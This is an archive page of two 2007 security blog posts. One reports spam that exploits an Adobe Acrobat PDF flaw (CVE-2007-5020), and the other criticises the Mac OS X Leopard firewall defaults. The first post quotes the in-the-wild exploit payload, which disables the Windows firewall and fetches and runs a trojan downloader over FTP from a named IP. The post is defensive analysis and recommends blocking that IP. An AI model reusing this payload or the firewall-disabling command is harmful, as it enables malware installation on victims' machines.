Archive for October, 2007

Oct 31

Massive exploitation of the PDF flaw by spam

in Confidentiality, In Internet, Internet, Security, Software, System and integrity. Comments Printable version Printable version

If you remember a few weeks ago I have written an post about a hole in adobe acrobat (CVE-2007-5020). It appears that the proof of concept is currently used to create a massive attack through spaming: you receive a mail with a pdf that contains the code to exploit the vulnerability. Since the vulnerability is not very old, I wonder how much serious it will became. Remember that Slammer or Code Red have used very old vulnerability (more that 6 month old). Thus many unpatched acroread are probably in the wild.

The current form of attack is used to install a backdoor. More specifically it does this ( SANS analysis):

obj<</URI(mailto :%/../../../../ ../../Windows /system32/cmd”.exe”” /c /q “@echo off&netsh firewall set opmode mode=disable&echo o 81. 95. 146. 130>1&echo binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&” “&”

In a more understable form (F-secure analysis) it means that the exploit disables the Windows Firewall by issuing the following command:

  • netsh firewall set opmode mode=DISABLE

Then it downloads the a file from the following FTP site and executes it:

  • ftp://203.121.69.116/[REMOVED].exe

Whish is Detected as Trojan-Downloader.Win32.Small.gkc. Currently, around of 32% of the common antivirus are able to detect it. Soon or later a new version that directly execute a shellcode or a wormcode will be in the wild and it will became very nasty because this time it will not be possible to block the backdoor download point with a firewall. In the mean time better safe than sorry: the IP 203.121.69.116 should be blacklisted in your firewall. Even if this box is not reachable anymore. Also remember that even if the backdoor is not installed this exploit still desactivate the XP firewall and therefore may introduce a subsequent problems.

Oct 30

Mac OS X Leopard (10.5) security: firewall analysis

in In Publications, Security and System. Comment Printable version Printable version

Leopard should have introduced 11 new security features, among them the firewall should have been re-worked.

However as pointed in the leopard security firewall analysis by heise Security

It appears that there is still some problems with the firewall. For me the three keys point that Apple should fixe are :

  1. Firewall need to be enable by defauflt. Better safe than sorry is the key to security. Since most people does not run network service it should not be a big deal any way.
  2. When you ask for “Block all incoming connections” it should be apply to any protocol not TCP. For instance this policy does not apply to NTP query (UDP) or even Netbios announce (UDP) … That is totally lame. Note that you can activate UDP filtering in the advanced setting.
  3. The last requirement is more arguable but still it deserves attention: Why do you have network service running by default ?

The combination of theses problems can lead to serious flaw for example : the NTP (Network Time protocol) shipped with Leopard is not the lastest (4.2.2 instead of 4.2.4). Imagine there is a flaw in it. Well with the firewall you should be enough safe to have the time to patch. But wait a minute, no you aren’t because the firewall is not activated! Even if you activate it and ask to “Block all incoming connections”, because NTP is a UDP protocol… Of course is you go to the firewall advanced setting you can block UDP traffic but what about the legendary OS X simplicity ?

« Older Entries